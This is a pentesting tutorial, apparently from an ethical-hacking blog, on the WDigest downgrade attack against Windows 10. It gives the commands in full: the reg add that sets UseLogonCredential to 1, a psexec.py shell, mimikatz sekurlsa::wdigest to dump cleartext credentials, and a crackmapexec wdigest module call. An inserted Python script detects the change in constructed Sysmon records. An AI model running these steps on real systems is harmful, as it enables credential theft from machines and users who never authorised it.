
By default wdigest is disabled on Windows 10, but not removed. You can enable it with a registry change. This is a short and sweet tutorial on how to dump Windows passwords by exploiting wdigest in a wdigest downgrade attack. I demonstrate how to exploit the challenge-response protocol wdigest to extract cleartext credentials through mimikatz and by using the crackmapexec module.

The attack involves making a registry change to the WDigest setting in the local group policy settings on the target. From an attacker's perspective, making an unauthorized registry change requires local admin permissions on the target.


As a local administrator I am going to make one little registry change to make this attack possible.

I am going to use this command to set the WDigest UseLogonCredential value to 1 in the Windows registry:

c:\Users\beh\Downloads\mimikatz_trunk\x64>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Then I use mimikatz for this simple example.

Here are the steps to exploit wdigest to dump user credentials from memory:

  1. Open a shell on the BEHWIN10 target using Impacket's psexec.py (this needs admin-level credentials): python3 psexec.py {user}:{pass}@target
  2. Use this command to set the UseLogonCredential value that Windows 10 leaves disabled (0) by default: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
  3. Log on as a new user; here I am using wa-kennyp.
  4. With your shell still open, start Mimikatz by running mimikatz, then run sekurlsa::wdigest.
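As an added example that is not part of the original post, here is the detection side of this change: a small Python check over Sysmon-style records (field names EventID, TargetObject, Details and CommandLine as Sysmon emits them; the records below are constructed, not real logs) that flags the UseLogonCredential value being set to 1, either as the registry write itself or as the reg add command line used above.

```python
import re

# Registry value that, when set to 1, re-enables cleartext WDigest caching (the value the tutorial changes).
WDIGEST_VALUE = r"hklm\system\currentcontrolset\control\securityproviders\wdigest\uselogoncredential"
# Matches a `reg add ... /v UseLogonCredential ... /d 1` command line like the one above, in any case.
REG_ADD_RE = re.compile(
    r"\breg(?:\.exe)?\s+add\s+\S*securityproviders\\wdigest\b.*?/v\s+uselogoncredential\b.*?/d\s+(?:0x)?1\b",
    re.IGNORECASE,
)

def is_wdigest_downgrade(event: dict) -> bool:
    """True when a Sysmon-style record shows UseLogonCredential being set to 1:
    Event ID 13 (registry value set) by target path and data, Event ID 1 (process create) by command line."""
    eid = event.get("EventID")
    if eid == 13:
        target = event.get("TargetObject", "").lower()
        details = str(event.get("Details", "")).strip().lower()
        return target == WDIGEST_VALUE and details in ("dword (0x00000001)", "1", "0x1")
    if eid == 1:
        return REG_ADD_RE.search(event.get("CommandLine", "")) is not None
    return False  # other event types carry no signal for this check

def scan(events):
    """Return (host, user, reason) tuples for every event that looks like the downgrade."""
    hits = []
    for ev in events:
        if is_wdigest_downgrade(ev):
            reason = "registry value set" if ev["EventID"] == 13 else "reg add command"
            hits.append((ev.get("Computer"), ev.get("User"), reason))
    return hits

# Constructed sample telemetry, not real logs: the first two records mimic the tutorial's
# change, the last two are benign (value reset to 0, read-only query).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "BEHWIN10", "User": "BEHWIN10\\beh",
     "CommandLine": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1"},
    {"EventID": 13, "Computer": "BEHWIN10", "User": "BEHWIN10\\beh",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Computer": "BEHWIN10", "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 1, "Computer": "BEHWIN10", "User": "BEHWIN10\\beh",
     "CommandLine": r"reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"},
]

if __name__ == "__main__":
    for host, user, reason in scan(SAMPLE_EVENTS):
        print(f"ALERT {host}: {user} re-enabled WDigest cleartext caching ({reason})")
```

Setting the value back to 0 restores the Windows 10 default described at the top of the post, and the third sample record shows what that remediation looks like in the same telemetry.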

Using Crackmapexec To Exploit Wdigest

First, if you don't know how to install the crackmapexec Docker image, do that. It is so much easier than trying to install from source or using one of the releases, because of the many dependencies. Check the wiki to see all the options.

Once you have installed Docker on Kali Linux, pull the crackmapexec image from Docker Hub with docker pull byt3bl33d3r/crackmapexec; this will kick off the installation.

Now start a new container from the newly acquired image.

kali@kali:~$ docker run -it --entrypoint=/bin/sh --name crackmapexec -v ~/.cme:/root/.cme byt3bl33d3r/crackmapexec

This starts the crackmapexec Docker container and drops you into a shell inside it.

docker run -it tells Docker I want an interactive session with a tty attached to the container (-i keeps stdin open, -t allocates a pseudo-terminal). It's like I just remoted into it. --entrypoint=/bin/sh overrides the entrypoint set for the image and just means run this command (/bin/sh or /bin/bash) instead. --name crackmapexec gives the container a name. -v is the volume mount: the first field, ~/.cme on the Kali host, is the directory to share, and the second field, /root/.cme, is the path where that file or directory is mounted inside the container. You can confirm the volume details by using the command docker inspect crackmapexec. Finally, byt3bl33d3r/crackmapexec is the image name. In other words: docker run -it --entrypoint={command} --name {give the container a name} -v {volume name}:{mount location} {image name}

You may know that crackmapexec has modules built-in for various tasks. You can list the possible options using python3 crackmapexec.py smb -L

Finally, move to the /usr/src/crackmapexec/cme directory and run the following to use the wdigest module remotely on the target:

python3 crackmapexec.py smb 10.0.0.64 -u 'wa-kennyp' -p 'Secret1' -M wdigest -o ACTION=enable

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
